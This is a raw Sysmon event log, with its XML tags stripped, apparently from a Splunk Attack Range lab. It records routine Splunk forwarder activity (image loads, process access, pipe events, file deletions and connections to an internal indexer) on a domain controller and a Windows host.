Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.580{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057345659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.580{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057345658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.580{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057345657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.580{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3trueSplunk, Inc.Valid 10341000x800000000000000057345656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.580{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057345655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.580{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057345654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.565{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057345653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:11.564{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:11.564{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:11.564{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:11.564{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:11.564{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:11.564{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 534500x800000000000000057345647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.148{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057345646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.148{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057345645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.148{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057345644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.148{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 354300x800000000000000057345643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:41.573{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54543-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x800000000000000021219644Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:59.508{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64323-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x800000000000000021219643Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.775{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EAFC3CD99424822525719C1A74ABC67,SHA256=65D38C6A4CEAE8EA7DE0CE95472B03F4A16D11F17A25610BC8ADF85582379649,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345709Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:12.080{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345708Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:12.080{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937925D87CD24EE96DF0D42B390B689C,SHA256=81569199D4A2BD9E2F87B744CFC3AEC8480F7D9E5A9FD4D73393AD1B3AA2ABE1falsetrue 11241100x800000000000000057345707Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:12.048{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345706Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:12.048{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E6B8A5B34468FF5B23D3CBC82813C3D,SHA256=945371B5B83255A0EB24FDF51214E0A64775B2916FF123DFB92D13ACFC92AC08falsetrue 11241100x800000000000000057345705Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:12.048{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:12.048{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=235A79D8C7AC4E77798348BB1B7EDDBD,SHA256=9E7E1E40583F68540A087A8F5D11E897096DE5190F54CDF7194093882F3EB4DFfalsetrue 10341000x800000000000000021219642Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.650{AD5E2759-5B48-618E-0FCE-08000000F101}30043876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219641Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.431{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B48-618E-0FCE-08000000F101}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219640Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.431{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219639Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.431{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219638Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.431{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219637Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.431{AD5E2759-5432-6143-0500-00000000F101}412428C:\Windows\system32\csrss.exe{AD5E2759-5B48-618E-0FCE-08000000F101}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219636Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.431{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219635Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.431{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B48-618E-0FCE-08000000F101}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219634Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.416{AD5E2759-5B48-618E-0FCE-08000000F101}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219633Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:12.212{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45029CFBD1B8EF578D46EE0273B74A6C,SHA256=419F045C6C0B02BE8274255AFE200CDB6C893DE833135C9B7C7351E68CBE3FFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219646Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:13.822{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56AB16948A0A0067647466C8E014E38A,SHA256=DAFB42FF47FB881E1EAD83E2ED24AD4F4BF6E5557C0803D403648492EF7502B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:13.094{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345710Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:13.094{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA9156F479FFB2951F17219702387776,SHA256=E9B892E1B58AECC0FE766F65B6905788825D517ABC146A1317B90FB2D687D4BFfalsetrue 23542300x800000000000000021219645Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:13.509{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89648A0385667763416906B76DD77ECE,SHA256=8ACFBB82A876A8EE44B26FE80E76A64F6C7EB228AA4AD4E4363764B1ADF7F1B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219647Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:14.822{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91D6E557D614D0A8BC7EB413C48CA38A,SHA256=48F540E326EE20000646B9905C6469F4DFAD9AE9BD1EBDF009FCC4151B998917,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345715Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:14.577{8B6011A9-886D-6164-1200-00000000F101}460C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-10-11 18:54:38.077 23542300x800000000000000057345714Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:14.577{8B6011A9-886D-6164-1200-00000000F101}460NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=0FDA5DBDAC06E0B0B8C2127D1EB896B9,SHA256=70622DBC9A818CF562E4B2C28388087A9BCAE502DF7455AD78F9D9A46DAFE296falsetrue 11241100x800000000000000057345713Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:14.112{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345712Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:14.112{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F72D2A85D2EE168BD2322707306D538,SHA256=777738535EC2137D76603D444544514B1A5D851D4E52E5868E96081B0F11B57Ffalsetrue 23542300x800000000000000021219648Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:15.837{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B341234BDEC2F81EB3E7A5678DB8C5B,SHA256=681E0C4AAE98E27D6EC985E35CE207BE13710D20B3C10CBE7CD41DBE3D10AF4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:15.130{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345716Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:15.130{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 